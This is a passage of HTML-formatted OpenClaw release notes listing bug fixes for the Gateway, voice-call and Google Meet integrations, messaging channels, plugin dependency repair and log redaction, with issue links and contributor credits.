<p>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</p>
</li>
<li>
<p>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</p>
</li>
<li>
<p>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</p>
</li>
<li>
<p>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</p>
</li>
<li>
<p>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</p>
</li>
<li>
<p>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</p>
</li>
<li>
<p>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</p>
</li>
<li>
<p>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</p>
</li>
<li>
<p>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</p>
</li>
<li>
<p>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</p>
</li>
<li>
<p>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</p>
</li>
<li>
<p>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</p>
</li>
<li>
<p>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</p>
</li>
<li>
<p>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</p>
</li>
<li>
<p>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</p>
</li>
<li>
<p>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</p>
</li>
<li>
<p>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</p>
</li>
<li>
<p>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</p>
</li>
<li>
<p>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</p>
</li>
<li>
<p>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</p>
</li>
<li>
<p>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</p>
</li>
<li>
<p>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</p>
</li>
<li>
